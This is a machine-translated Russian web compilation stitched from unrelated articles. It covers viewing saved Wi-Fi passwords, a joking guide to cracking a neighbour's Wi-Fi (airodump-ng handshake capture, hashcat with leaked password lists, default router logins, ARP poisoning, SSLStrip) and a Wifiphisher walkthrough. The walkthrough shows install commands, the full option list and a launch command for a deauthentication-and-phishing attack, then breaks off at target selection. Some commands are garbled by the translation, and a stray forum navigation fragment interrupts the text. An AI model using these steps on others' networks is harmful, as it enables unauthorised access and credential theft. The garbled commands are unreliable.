Обратите внимание! Невозможно определение идентификатора, данное производителем маршрутизатора, в случае отсутствия доступа к нему.

Детально разобравшись, что такое SSID в настройках роутера, следует помнить несколько нюансов:

• Android подключается так же, как и ПК.
• Если есть видимое подключение, он может находить и подключаться автоматически.
• Настраивать ничего не нужно.
• Требуется выбрать имя из списка доступных и ввести пароль.

Удобно пользоваться специальными программами. К примеру, приложения Android Wi-Fi-Manager ищут бесплатные точки доступа.

Очень кстати окажется приложение Wi-Fi Key Recovery. Оно запоминает пароли, которые были введены ранее на устройстве. Таким образом, находясь на работе или в гостях, не нужно всякий раз спрашивать пароль. Включается программа, в поле «SSID» выбирается интересующая точка доступа — и тут же высвечивается пароль.

Если же точка доступа скрыта, надо знать имя маршрутизатора, ключ безопасности и при необходимости — тип шифрования. Впрочем, такую защиту тоже можно обойти. Для этого существуют специальные приложения. К примеру, со скрытыми сетями SSID работает программа Wi-Fi Connection Manager. Она сканирует все существующие сети вокруг, может подключать к ним устройство и позволяет управлять ими в целом. Имеет множество иных дополнительных возможностей.

Используя представленные выше инструкции, даже неопытный пользователь сможет легко разобраться, как узнать, правильно подключать и успешно пользоваться SSID Wi-Fi.

Похожие статьи

Найдите пароль WiFi подключенной сети в Windows | Mac | Android | iOS

Вот как можно узнать пароль WiFi с компьютера или смартфона. Теперь, не заблуждайтесь, здесь мы говорим о поиске пароля WiFi подключенной сети . И не взламывать Wi-Fi соседа.

Итак, приступим (или просмотрите видеоурок ниже)

1. Найдите пароль Wi-Fi в Windows 7/8/10

Знаете ли вы, что Windows хранит все пароли Wi-Fi, к которым вы когда-либо подключались? Не только текущая сеть Wi-Fi.И вы можете быстро найти его, выполнив простую команду в cmd или перейдя в настройки сети.

Метод 1 - Использование cmd

Самый быстрый способ найти пароль WiFi в Windows - использовать командную строку. Это работает даже для сетей Wi-Fi, к которым вы подключались раньше. Тем не менее, вам нужно будет помнить их SSID (имя WiFi) в надлежащих случаях, чтобы восстановить их пароль. Итак, вот как это сделать.

Просто откройте cmd и введите следующую команду.

netsh wlan показать профиль WiFiName key = clear

Здесь замените WiFiName своим SSID (или именем сети, к которой вы подключались ранее). И это все. Прокрутите вниз, пока не увидите настройку безопасности и рядом с вашим ключевым содержимым - ваш пароль.

Метод 2 - Использование сетевых настроек

Если вы предпочитаете графический интерфейс, перейдите в свою сеть и центр совместного использования. Чтобы сделать Щелкните правой кнопкой мыши значок беспроводной сети на панели задач и выберите «Открыть центр управления сетями и общим доступом».

Затем щелкните имя WiFi> , откроется новое окно, выберите Свойство беспроводной сети> Щелкните вкладку Security и установите флажок Показать символы , чтобы увидеть скрытый пароль.

Смотрите гифку здесь.

Примечание. В Windows 8 и 10 нет способа найти пароль Wi-Fi для сети, к которой вы подключались в прошлом, с использованием подхода с графическим интерфейсом.Для этого вам нужно использовать cmd.

# 2 Найти пароль WiFi в Mac OS

Как и Windows, вы также можете найти пароль Wi-Fi для текущей сети, а также для ранее подключенной сети. Но теперь вам понадобится « admin привилегии », чтобы увидеть пароль WiFi. Невозможно найти пароль Wi-Fi в Mac OS, если вам не нужен пароль администратора.

Итак, вот как это сделать.

Начните с нажатия cmd + пробел , чтобы вызвать прожектор и выполнить поиск « Keychain Access ».

Вы также можете перейти в / Applications / Utilities / Keychain Access.

Здесь вы увидите список всех сетей WiFi. Но прежде чем вносить какие-либо изменения, вам нужно разблокировать замок .

Теперь прокрутите вниз, пока не увидите свое текущее имя WiFi (или воспользуйтесь строкой поиска вверху).

Как только вы найдете имя WiFi> , дважды щелкните его> показать пароль> введите пароль для входа на MAC. И вот вам пароль Wi-Fi этой сети.

Если у вас нет доступа к паролю администратора, не сможет найти пароль WiFi в MAC. Но есть обходной путь, упомянутый в конце статьи.

# 3 Найти пароль WiFi в Linux

Чтобы найти пароль Wi-Fi в Linux (проверено на Ubuntu), откройте терминал, введите эту команду и нажмите Enter. Он попросит вас ввести пароль пользователя, введите его и снова нажмите Enter.И вот список подключений и их пароль.

sudo grep psk = / etc / NetworkManager / system-connections / *

Эта звездочка отображает все подключения и их ключи. Если вы хотите увидеть ключи определенной сети, замените звездочку на SSID сети.

# 4 Найти пароль Wi-Fi на Android

Что касается Android, то здесь даже сложнее, чем Mac OS. Почему? Потому что файл, в котором хранятся пароли Wi-Fi, зашифрован и недоступен для обычных пользователей.Вам понадобится root доступ для просмотра его содержимого. Нет возможности увидеть его без рут-доступа. Даже если вы сейчас выполните рутинг, он сотрет все данные и выйдет из сети

Теперь, если вам повезет, и у вас есть телефон или планшет Android с рутированным доступом, вы можете использовать такое приложение, как Free WiFi Password Recovery, чтобы восстановить все сохраненные пароли Wi-Fi. Приложение бесплатное, и по сравнению с другими аналогичными приложениями в магазине оно имеет менее навязчивую рекламу.

В качестве альтернативы, если вам нравится делать это без какого-либо приложения, откройте проводник файлов ES, проведите пальцем вправо, чтобы открыть меню, и включите ROOT Explorer, затем перейдите в корневой каталог - / data / misc / wifi /. Оказавшись там, прокрутите вниз, пока не увидите файл wpa_supplicant.conf и откройте его в любом текстовом редакторе.

Здесь вы найдете все SSID с их паролем.

# 5 Найти пароль Wi-Fi на iOS

Как и Android, iPhone и iPad также скрывают пароль от Wi-Fi. Но если вам посчастливилось заполучить iPhone с джейлбрейком, вы можете использовать эту бесплатную утилиту под названием WiFi Passwords (не тестировалось).

Однако вы можете увидеть сохраненный пароль Wi-Fi на вашем iPhone (не работает на iPad), если у вас есть компьютер Mac и ваш iPhone и Mac подключены к той же учетной записи iCloud . Итак, как только у вас есть это, вы можете получить доступ к базе данных связки ключей вашего iPhone (файл, в котором хранятся все пароли) с вашего Mac.

Для получения дополнительной информации ознакомьтесь с этим руководством по просмотру сохраненных паролей iPhone WiFi на Mac (без взлома)

# 6 Найдите пароль Wi-Fi на маршрутизаторе

Если по какой-либо причине вышеперечисленные методы не помогли, вы всегда можете проверить пароль прямо со страницы роутера.

Откройте браузер с любого устройства, подключенного к сети. В адресной строке введите «IP-адрес маршрутизатора».Обычно это 192.168.1.1 или 192.168.0.1 . Но он может отличаться в зависимости от роутера. Не волнуйтесь, эту информацию можно получить с помощью быстрого поиска в Google по номеру модели вашего маршрутизатора.

Затем введите имя пользователя и пароль маршрутизатора.

Опять же, это различно для каждого устройства, поэтому спросите владельца (или попробуйте admin как имя пользователя и пароль). После успешного входа в систему перейдите к настройке беспроводной сети и там вы найдете пароль в поле Пароль беспроводной сети .

Что делать, если ничего не работает?

В большинстве случаев вышеупомянутые методы помогут вам восстановить пароль Wi-Fi, но в случае, если у вас есть телефон Android без рутирования и нет доступа к маршрутизатору, вот несколько вещей, которые вы можете попробовать подключиться к маршрутизатору с помощью PIN-код WPS по умолчанию.

Если у вас есть физический доступ к маршрутизатору, найдите небольшую опцию WPS на задней панели маршрутизатора и нажмите ее. Теперь на своем смартфоне Android перейдите в Настройки беспроводной сети> Дополнительные параметры> включите сканирование WPS.

При одновременном нажатии кнопки WPS на маршрутизаторе и смартфоне Android маршрутизатор автоматически передает пароль Wi-Fi по беспроводной сети и подключает устройство к маршрутизатору без необходимости вводить пароль Wi-Fi. (Видеоурок здесь)

Подробнее: Что делать, если вы забыли свой пароль Wi-Fi

Взлом Wi-Fi вашего соседа

Эй, малыш, хочешь взломать Wi-Fi?

Эта статья - ваше руководство по взлому домашнего Wi-Fi без содержания лактозы. В конце концов, это нормально - чувствовать страх, неуверенность или даже желание покупать оптом домашнее сетевое оборудование. Это нормально. Мы все были там.

Разве не странно, как, когда вы переезжаете и подключаетесь к Интернету, вы обычно получаете домашний маршрутизатор как часть пакета? Разве не странно, как этот роутер держится с помощью спичек, нарушенных обещаний и мужского высокомерия?

Знаете ли вы, что кто-нибудь поблизости может отключить вас от сети Wi-Fi?

Знаете ли вы, что ваш телефон постоянно передает имена и адреса (через прокси) каждой сети Wi-Fi, к которой вы когда-либо подключались?

Да, все довольно сломано, а?

Ниже приведены шаги по его взлому.

Шаг 0: На самом деле этого не делайте

В качестве легко запоминающегося примера я использую «ваш сосед».

Возможно, вам в голову пришла идея, которая кажется гениальной: «Вау, я должен взломать Wi-Fi моего соседа, потому что эээээээ». Это плохая идея, так же как и попытка проникнуть в дом соседа - плохая идея.

Если вы действительно хотите взломать какой-то Wi-Fi, попробуйте отключить его и сделать это со своим собственным Wi-Fi.

Шаг 1. Найдите подходящий Wi-Fi

Так в нашем 99.Теоретический сценарий 99999%, вы и ваш ноутбук находитесь в зоне действия соседнего Wi-Fi-роутера. Вы не знаете пароль, но хотите подключиться. Пора совершить несколько преступлений.

Первое, что вам нужно сделать, это достать свой ноутбук и запустить airodump-ng, инструмент, предназначенный именно для взлома Wi-Fi.

Вот как это выглядит.

Вы видите названия ближайших сетей Wi-Fi, а также их «BSSID», который немного похож на идентификатор для сетей Wi-Fi. На самом деле это именно так .

Шаг 2. Получите хэш пароля

После того, как вы узнаете BSSID соседнего Wi-Fi, цель - получить пароль Wi-Fi. Маршрутизатор не сообщит вам пароль Wi-Fi, но выдаст хэш пароля .

Хэш пароля похож на зашифрованную версию пароля. Вы не можете его расшифровать. Это вроде как нельзя снова взбить яичницу на белок и желток.

Мы собираемся найти хэш, наблюдая за ... секретным рукопожатием.

Секретное рукопожатие

Вы меня слышали.

«это реально»

Вам может быть интересно, почему каждый раз, когда вы подключаетесь к Wi-Fi, происходит секретное рукопожатие, и это справедливо, я рад, что вы спросили.

Допустим, вы - настоящий бизнесмен, который просто подключается к домашней сети Wi-Fi. Никаких забавных дел. Вы знаете пароль. Но вам нужно доказать Wi-Fi, что вы знаете пароль. И Wi-Fi должен вам доказать, что это знает пароль.Проблема в том, что все вас слышат.

Wi-Fi постоянно передается в виде радиоволн из вашего устройства и маршрутизатора. Любой в пределах досягаемости может услышать, что вы говорите.

Это как если бы вы подошли ко мне на вечеринке и сказали: «Я знаю ваш пароль на Facebook». Это становится настоящим напряжением. Я нервно смотрю на вас и говорю: «Правда?». Я хочу знать, действительно ли вы знаете мой пароль на Facebook, но я также не хочу, чтобы вы просто сказали: «Ваш пароль Facebook - cooldude69», потому что все остальные на вечеринке меня слушают.

Итак, секретное рукопожатие позволяет вам и маршрутизатору Wi-Fi доказать, что вы знаете пароль, не произнося его.

Подслушивание

Уловка заключается в том, что, отслеживая рукопожатие, перехватчик (то есть мы) мог увидеть:

• Случайно выбранный фрагмент текста (например, 3b5ef )
• Тот же текст, зашифрованный паролем Wi-Fi в качестве ключа ( b8% & G )

Вы знаете текст, вы знаете, что он шифрует, и вы знаете, как это сделать.Единственное, чего вы не знаете, - это ключ. Это означает, что вы можете угадать что-то как ключ, и проверит , если ваше предположение было правильным.

Мы видим, что «3b53f» зашифровывает до «b8% & G»

Попробуйте зашифровать «3b53f» с помощью ключа «password1» -> «AAERJ» // Неверно!

Попробуйте зашифровать «3b53f» с помощью ключа «cooldad1964» -> «b8% & G» // Нашел!

Что, если вы просто зашифруете текст 3b5ef с помощью ключа cooldad1964 , и получится зашифровать до b8% и G ?

Тогда вы знаете, что пароль был cooldad1964 .И если 3b5ef шифрует что-то еще, то вы знаете, что ваше предположение было ошибочным.

Шаг 3. Взломайте пароль

Итак, используя описанный выше трюк, мы собираемся всего угадать пароль. Хитрость в том, что мы сможем угадывать пароли намного быстрее, чем если бы мы просто вводили их в поле «Введите пароль для этой сети Wi-Fi».

Итак, возьмите ручку и бумагу и сдуйте пыль с компаса и линейки, потому что пора заняться шифрованием.

Шучу, мы не будем использовать ручку и бумагу, ты, придурок. Мы собираемся использовать видеокарту.

Видеокарты - это часть компьютера, которая позволяет ему играть в 3D-игры, такие как PLAYERUNKNOWN’S ALLCAPS Murder Paradise и Viva Piñata: Party Animals. Кроме того, они очень быстро шифруют данные.

Итак, мы собираемся получить большой список из миллионов паролей и попробовать их все, чтобы попытаться угадать пароль Wi-Fi.

artisanal_passwords.txt

Итак, вы знаете, как взламывают сайты?

Иногда хакеры раскрывают пароли всех пользователей веб-сайта в момент его взлома. Возможно, вы слышали об этом как о «утечке данных». Сайты, которые недавно были взломаны и пароли были опубликованы, включают LinkedIn, Adobe и Myspace.

Вы, человек с подключением к Интернету, можете найти эти списки через Google. Никакого даркнета, никаких прокси-серверов и требований, чтобы родители называли вас только вашим «кодовым именем», ничего.

Существует два типа домашних сетей Wi-Fi : тип, который называется NETGEAR-7BDFC , который, вероятно, имеет случайно сгенерированные пароли, и вид, который называется Chris & Liz 2013 , с паролями, которые находятся в эти списки паролей.

Я предполагаю, что пароль вашего соседа, вероятно, находится в одном из огромных списков паролей. Но чтобы выяснить, какой именно, нам нужно будет зашифровать 3b5ef (в этом примере) каждым паролем в списке в качестве ключа шифрования ^{и посмотреть, соответствует ли какой-либо из них тому, что мы видели в Wi -Fi пароль зашифрован до ( b8% и G ).}

(Если у вашего соседа есть один из этих случайно сгенерированных паролей, значит, вам не повезло. Шучу, нажмите здесь, чтобы повеселиться.)

Теперь, когда вы «приобрели» эти списки паролей, вам нужно выяснить, какой пароль является паролем Wi-Fi.

Быстрый подбор пароля

Hashcat - это программа, которая может взять список паролей и хэш ^{(«b8% & G») и попытаться «распаковать» его, сравнивая его со всеми паролями в списке. Чтобы оценить, сколько времени это займет, мой компьютер может проверить 10 миллионов паролей примерно за 10 минут.Специализированные компьютеры, переполненные видеокартами, могут сделать это за секунды.}

Вы просто вставляете файл, содержащий рукопожатие, полученное на шаге 2, в hashcat вместе со списками паролей.

И все, . Hashcat, скорее всего, просто выдаст пароль, и вы можете просто ввести его в поле Wi-Fi «Введите пароль». Основная часть - яростно угадывает миллионы паролей, пока мы не найдем нужный.

Почему это работает?

Потому что люди выбирают пароли, которые легко угадать.Английское слово с первой буквой может быть заглавным, а затем одна или две цифры? Этот шаблон охватывает паролей и паролей людей, и компьютер может просто быстро проверить их все.

Если вы обычный пользователь Интернета, ваш пароль для всего один и тот же, это имя вашего питомца, за которым следует номер вашего дома. Хуже того, вероятно, это пароль, который хакеры уже записали в свои списки паролей. Я хочу сказать, что в среднем большинство паролей Wi-Fi, которые выбирают люди, не имеют шансов против этих списков паролей.

Вы можете проверить, был ли ваш пароль украден (и опубликован) хакерами, перейдя по адресу https://haveibeenpwned.com

Так что, наверное, можно взломать домашний Wi-Fi. Какой в ​​этом смысл?

Как узнать пароль интернет-провайдера вашего соседа

часто хранят пароль, используемый для подключения к Интернет-провайдеру, на своих страницах администрирования.

Этот пароль позволит вам доказать, что вы ваш сосед при разговоре с их провайдером. Вы можете полностью отменить их Интернет.Вы можете увидеть их платежную информацию. Вы они.

Позвольте мне провести вас через сложный процесс взлома домашнего маршрутизатора.

Сначала вы открываете популярную программу для взлома Google Chrome и переходите к 192.168.0.1, который обычно является IP-адресом маршрутизатора.

Когда вы попадете туда, вы увидите что-то вроде этого.

Самый простой админ / админ вашей ЖИЗНИ прямо здесь.

После того, как вы войдете в маршрутизатор, пароль появится на странице конфигурации.

о нет! Пароль - просто точки! Ваша хакерская карьера закончилась еще до того, как началась!

Не бойся, молодой колдун-клавишник, ведь в этой кат-сцене тебя спасает deus ex machina.

Вы можете нажать правой кнопкой мыши> Проверить элемент (голос хакера: я нахожусь) в поле пароля, и вы увидите это:

Измените этот HTML, чтобы удалить type = "password" aaaaaaand

Верно, точки были поставлены только вашим браузером .Пароль был у них все время. Вы оказались в тюрьме собственного разума.

Украсть данные соседа

Итак, это уже не так круто, как раньше, но, используя древние запрещенные методы, такие как отравление ARP (не так круто, как кажется), вы можете следить за тем, что ваш сосед отправляет в Интернет.

Это не сработает для веб-сайтов с этой искусно созданной зеленой блокировкой HTTPS, поскольку данные вашего соседа будут зашифрованы. Но по-прежнему существует множество сайтов, которые будут запрашивать ваш пароль или информацию о кредитной карте по обычному протоколу HTTP.

Даже для некоторых сайтов HTTPS (которые не используют закрепление сертификатов, HSTS или другие темные ритуалы) вы можете заставить свою жертву использовать простой незашифрованный HTTP с помощью SSLStrip.

Возможно, что чтение слов на этой гипертекстовой странице заставило вас усомниться в пуленепробиваемости вашей домашней сети.

Вот несколько советов, которые помогут вам не беспокоиться о безопасности домашнего Wi-Fi.

1. Абсолютно ничего

Даже не беспокойтесь об этом.Пул людей, которые могут атаковать ваш домашний Wi-Fi, ограничен людьми в физическом диапазоне из них.

Веб-сайт, такой как PayPal, может быть атакован:

Ваш домашний Wi-Fi может атаковать:

Я хочу сказать, что вероятность того, что кто-то, обладающий навыками и мотивацией, взломает ваш Wi-Fi , на самом деле это сделает ... очень мала . Вероятно, ваши соседи - просто такая милая семья и тот парень, который всегда оставляет свои пивные бутылки в вашем мусорном ведре.

В любом случае этот парень не собирается взламывать ваш Wi-Fi. Вот почему это не катастрофа всего , потому что безопасность Wi-Fi у большинства людей не очень хорошая.

Вы можете оставить запасной ключ под ковриком или не беспокоиться о том, чтобы запирать окна , хотя кто-то может легко через них пролезть, потому что вы не беспокоитесь о том, что кто-то физически проникнет внутрь. Точно так же и ваш дом, вероятно, не беспокоит не нужна сверхсильная безопасность Wi-Fi.

Так что не беспокойтесь об этом! Иди на пляж! Работайте весь день, чтобы богатый чувак стал немного богаче! Он мог бы поблагодарить вас, но, вероятно, нет! Съешьте кекс! О вашей безопасности Wi-Fi, вероятно, не стоит беспокоиться.

2. Включить режим паранойи

«Подождите, а что, если кто-то пытается взломать мой домашний Wi-Fi, например, мое местное правительство или, возможно, особенно умная птица?»

Я имею в виду, что у правительства есть гораздо более простые способы шпионить за вами, но если вы действительно хотите усилить безопасность Wi-Fi, вы можете:

• Используйте WPA2-PSK и измените пароль Wi-Fi на что-то неугодное, но легко доступное (для ваших гостей, конечно). Хорошие примеры включают fresh * life * fresh * манго и gday $ one $ internet $, пожалуйста, .Или случайным образом сгенерируйте такой, как [адрес электронной почты] и * 3Wj , если вы ненавидите своих гостей и любите печатать.

• Установите кастомную прошивку роутера, например DD-WRT. У него гораздо меньше дыр в безопасности, чем у любого спагетти PHP 1997 года, с которым поставлялся ваш маршрутизатор.

Спасибо, что нашли время прочитать это сообщение в блоге.

Большое спасибо за эти

android - Как получить BSSID Wi-Fi, к которому я подключаюсь в Unity (C #)?

1. Около
2. Продукты
3. Для команд

1. Переполнение стека Общественные вопросы и ответы
2. Переполнение стека для команд Где разработчики и технологи делятся частными знаниями с коллегами

Получите чей-либо пароль Wi-Fi без взлома с помощью Wifiphisher «Null Byte :: WonderHowTo

В то время как взлом паролей и PIN-атаки установки WPS привлекают много внимания, атаки социальной инженерии на сегодняшний день являются самым быстрым способом получения пароля Wi-Fi. Одной из самых мощных атак социальной инженерии Wi-Fi является Wifiphisher, инструмент, который блокирует Интернет до тех пор, пока отчаявшиеся пользователи не введут пароль Wi-Fi, чтобы включить обновление прошивки поддельного маршрутизатора.

Атаки социальной инженерии являются мощными, потому что они часто полностью обходят защиту.Если вы можете обманом заставить сотрудника ввести пароль на поддельную страницу входа, не имеет значения, насколько надежен пароль. Это противоположно атакам взлома, когда вы используете вычислительную мощность компьютера, чтобы быстро попробовать гигантский список паролей. Но вы не сможете добиться успеха, если пароль, который вы атакуете, безопасен и не включен в ваш список паролей.

Незнание того, насколько надежен пароль, на который вы нападаете, может расстраивать, потому что инвестирование времени и вычислительной мощности, задействованных в атаке по словарю или грубой силе, может сделать бессмысленную атаку огромной тратой ресурсов.Вместо этого такие инструменты, как Wifiphisher, задают вопросы о людях, стоящих за этими сетями.

Знает ли средний пользователь, как выглядит страница входа в систему его Wi-Fi роутера? Заметили бы они, если бы все было иначе? Что еще более важно, будет ли занятый пользователь, отключенный от Интернета и находящийся в состоянии стресса из-за сбоя, по-прежнему вводить свой пароль, чтобы включить поддельное обновление, даже если они заметят, что страница входа выглядит немного иначе?

Вифифишер считает, что ответ - «да». Инструмент может выбрать любую ближайшую сеть Wi-Fi, деаутентифицировать всех пользователей (заблокировать ее) и создать клонированную точку доступа, для присоединения которой не требуется пароль.Любой пользователь, который подключается к открытой сети, похожей на злого близнеца, получает убедительно выглядящую фишинговую страницу, требующую пароль Wi-Fi для обновления прошивки, что объясняется как причина, по которой Wi-Fi перестал работать.

Обновление прошивки от ада

Для цели атаки социальной инженерии первые признаки Wifiphisher выглядят как проблема с маршрутизатором. Сначала отключается Wi-Fi. Они по-прежнему видят сеть, но все попытки подключиться к ней сразу же терпят неудачу.Другие устройства также не могут подключиться к сети, и они начинают замечать, что не только одно устройство, но и каждое устройство Wi-Fi потеряло соединение с сетью.

Вот когда они замечают новую сеть с тем же именем, что и старая сеть, но не требующая пароля. После еще нескольких попыток присоединиться к защищенной сети они присоединяются к открытой сети из опасений, что их маршрутизатор внезапно транслирует сеть без пароля, к которому может присоединиться любой. Как только они присоединяются, открывается официальная веб-страница с упоминанием производителя их маршрутизатора и информирует их о том, что маршрутизатор подвергается критическому обновлению прошивки.Пока они не введут пароль для применения обновления, интернет не будет работать.

После ввода сверхзащищенного пароля Wi-Fi экран загрузки начинает ползать по экрану при перезапуске маршрутизатора, и они немного гордятся тем, что серьезно относятся к безопасности своего маршрутизатора, установив это критическое обновление. Через минуту ожидания их устройства повторно подключаются к сети, теперь они более безопасны благодаря установленному обновлению.

Легкий доступ с помощью Bossy Update

Для хакера получить пароли так же просто, как выбрать, на какую сеть вы хотите настроить таргетинг.После определения цели Wifiphisher немедленно блокирует все устройства, подключенные к сети, увеличивая вероятность того, что кто-то, подключенный к сети, расстроится и применит поддельное обновление. Затем информация о сети клонируется, и ложная сеть Wi-Fi транслируется, чтобы цель думала, что их маршрутизатор работает в каком-то неопределенном режиме обновления.

Устройства, подключающиеся к сети, сразу же заносятся в список, а фишинговая страница настраивается в соответствии с производителями маршрутизатора путем считывания первой части MAC-адреса маршрутизатора.После обмана любой из целей, подключенных к целевой сети, для ввода пароля, Wifiphisher информирует хакера, пока не торопится. После отправки захваченного пароля цель жестоко занята как фальшивым экраном загрузки обновлений, так и фальшивым таймером перезагрузки, чтобы выиграть время для хакера, чтобы проверить захваченный пароль.

Что вам понадобится

Чтобы эта атака сработала, вам понадобится совместимый с Kali Linux адаптер беспроводной сети. Если вы не уверены, что выбрать, ознакомьтесь с одним из наших руководств по выбору того, которое поддерживает режим монитора и внедрение пакетов, по ссылке ниже.

Помимо хорошего беспроводного сетевого адаптера, вам понадобится компьютер под управлением Kali Linux, который вы должны сначала обновить, запустив apt update и apt upgrade . Если вы этого не сделаете, вы, скорее всего, столкнетесь с проблемами в процессе установки Wifiphisher ниже.

Шаг 1. Установка Wifiphisher

Для начала мы можем открыть окно терминала и ввести apt install wifiphisher , чтобы установить Wifiphisher.

  ~ # apt install wifiphisher Чтение списков пакетов ... Готово Построение дерева зависимостей Чтение информации о состоянии ... Готово wifiphisher - это уже самая новая версия (1.4 + git20191215-0kali1). Следующие пакеты были установлены автоматически и больше не требуются: dh-python libdouble-conversion1 liblinear3 Используйте 'apt autoremove', чтобы удалить их. 0 обновлено, 0 установлено заново, 0 удалено и 1891 не обновлено.  

Если вы хотите попробовать установить его из репозитория GitHub, вы можете сделать это, клонировав репозиторий и следуя инструкциям на странице GitHub, например:

  ~ # git clone https: // github.com / wifiphisher / wifiphisher.git ~ # cd wifiphisher ~ # sudo python setup.py install  

Это должно установить Wifiphisher, который с этого момента вы можете начать, просто набрав имя программы в окне терминала.

Шаг 2. Просмотрите флаги Wifiphisher

У вас должна быть возможность запустить сценарий в любое время, просто набрав sudo wifiphisher в окне терминала. Хотя у Wifiphisher нет справочной страницы, вы можете увидеть на его странице --help , что у него есть довольно внушительный список параметров конфигурации, которые вы можете изменить, добавив к команде различные флаги.

  ~ # wifiphisher --help использование: wifiphisher [-h] [-i ИНТЕРФЕЙС] [-eI EXTENSIONSINTERFACE] [-aI АПИНТЕРФЕЙС] [-iI ИНТЕРНЕТИНТЕРФЕЙС] [-iAM MAC_AP_INTERFACE] [-iEM MAC_EXTENSIONS_INTERFACE] [-iNM] [-kN] [-nE] [-nD] [-dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...]] [-e ESSID] [-dE DEAUTH_ESSID] [-p PHISHINGSCENARIO] [-pK PRESHAREDKEY] [-hC HANDSHAKE_CAPTURE] [-qS] [-lC] [-lE LURE10_EXPLOIT] [--logging] [-dK] [-lP LOGPATH] [-cP CREDENTIAL_LOG_PATH] [--payload-path PAYLOAD_PATH] [-cM] [-wP] [-wAI WPSPBC_ASSOC_INTERFACE] [-kB] [-fH] [-pPD PHISHING_PAGES_DIRECTORY] [--dnsmasq-conf DNSMASQ_CONF] [-pE PHISHING_ESSID] необязательные аргументы: -h, --help показать это справочное сообщение и выйти -i ИНТЕРФЕЙС, --interface ИНТЕРФЕЙС Вручную выберите интерфейс, поддерживающий как AP, так и режимы мониторинга для создания мошеннической точки доступа, а также проведение дополнительных атак Wi-Fi от расширений (я.е. деаутентификация). Пример: -i wlan1 -eI EXTENSIONSINTERFACE, --extensionsinterface EXTENSIONSINTERFACE Вручную выберите интерфейс, поддерживающий монитор режим деаутентификации жертв. Пример: -eI wlan1 -aI APINTERFACE, --apinterface APINTERFACE Вручную выберите интерфейс, поддерживающий режим AP для порождает мошенническую AP. Пример: -aI wlan0 -iI ИНТЕРНЕТИНТЕРФЕЙС, --интернет-интерфейс ИНТЕРНЕТИНТЕРФЕЙС Выберите интерфейс, подключенный к Интернет Пример: -iI ppp0 -iAM MAC_AP_INTERFACE, --mac-ap-interface MAC_AP_INTERFACE Укажите MAC-адрес интерфейса AP -iEM MAC_EXTENSIONS_INTERFACE, --mac-extensions-interface MAC_EXTENSIONS_INTERFACE Укажите MAC-адрес интерфейса расширений -iNM, --no-mac-randomization Не меняйте MAC-адрес -kN, --keepnetworkmanager Не убивайте NetworkManager -nE, --noextensions Не загружать расширения.-nD, --nodeauth Пропустить этап деаутентификации. -dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...], --deauth-channels DEAUTH_CHANNELS [DEAUTH_CHANNELS ...] Каналы на деаутентификацию. Пример: --deauth-channels 1,3,7 -e ESSID, --essid ESSID Введите ESSID мошеннической точки доступа. Этот вариант пропустит этап выбора точки доступа. Пример: --essid «Бесплатный Wi-Fi» -dE DEAUTH_ESSID, --deauth-essid DEAUTH_ESSID Деаутентифицируйте все BSSID в WLAN с этим ESSID.-p PHISHINGSCENARIO, --phishingscenario PHISHINGSCENARIO Выберите сценарий фишинга для запуска. пропустить этап выбора сценария. Пример: -p Обновление прошивки -pK PRESHAREDKEY, --presharedkey PRESHAREDKEY Добавьте защиту WPA / WPA2 на несанкционированную точку доступа. Пример: -pK s3cr3tp4ssw0rd -hC HANDSHAKE_CAPTURE, --handshake-capture HANDSHAKE_CAPTURE Захват рукопожатий WPA / WPA2 для проверки пароль Пример: -hC capture.pcap -qS, --quitonsuccess Остановить скрипт после успешного получения одной пары полномочий -lC, --lure10-capture Захват BSSID обнаруженных точек доступа на этапе выбора точки доступа. Эта опция является частью Lure10 атака. -lE LURE10_EXPLOIT, --lure10-exploit LURE10_EXPLOIT Обманите службу определения местоположения Windows в соседней Windows пользователи считают, что он находится в области, которая была ранее был записан с помощью --lure10-capture.Часть Lure10 атака. - ведение журнала активности в файл -dK, --disable-karma Отключает атаку KARMA -lP LOGPATH, --logpath LOGPATH Определите полный путь к файлу журнала. -cP CREDENTIAL_LOG_PATH, --credential-log-path CREDENTIAL_LOG_PATH Определите полный путь к файлу, который будет хранить любые захваченные учетные данные --payload-путь PAYLOAD_PATH Путь полезной нагрузки для сценариев, обслуживающих полезную нагрузку -cM, --channel-monitor Следите за тем, чтобы целевая точка доступа изменяла канал.-wP, --wps-pbc Следить за тем, чтобы кнопка на регистраторе WPS-PBC нажал. -wAI WPSPBC_ASSOC_INTERFACE, --wpspbc-assoc-interface WPSPBC_ASSOC_INTERFACE Интерфейс WLAN, используемый для подключения к WPS. Точка доступа. -kB, --known-beacons Транслировать рекламные кадры ряда маяков популярные WLAN -fH, --force-hostapd Принудительно использовать hostapd, установленный в системе -pPD PHISHING_PAGES_DIRECTORY, --phishing-pages-directory PHISHING_PAGES_DIRECTORY Искать фишинговые страницы в этом месте --dnsmasq-conf DNSMASQ_CONF Определите полный путь к настраиваемому dnmasq.conf файл -pE PHISHING_ESSID, --phishing-essid PHISHING_ESSID Определите ESSID, который вы хотите использовать для фишинга стр.  

Шаг 3. Подключите адаптер беспроводной сети

Теперь пора подготовить адаптер беспроводной сети, подключив его. Wifiphisher переведет вашу карту в режим беспроводного монитора, если вы этого не сделаете сами.

Хороший адаптер дальнего действия на Amazon: USB-адаптер Alfa AWUS036NHA Wireless B / G / N - 802.11n - 150 Мбит / с - 2,4 ГГц - 5 дБи Антенна

Шаг 4: Запуск сценария

Я собираюсь использовать свой беспроводной сетевой адаптер USB, поэтому я добавлю к команде флаг -i и добавьте имя моего сетевого адаптера. Если я этого не сделаю, Wifiphisher просто возьмет любой сетевой адаптер, какой сможет.

Чтобы запустить сценарий, я выполню следующую команду.

  ~ # wifiphisher -i wlan1  

После этого мы должны увидеть страницу со всеми ближайшими сетями.Здесь мы можем выбрать, какую сеть мы хотим атаковать, и нажать Введите .

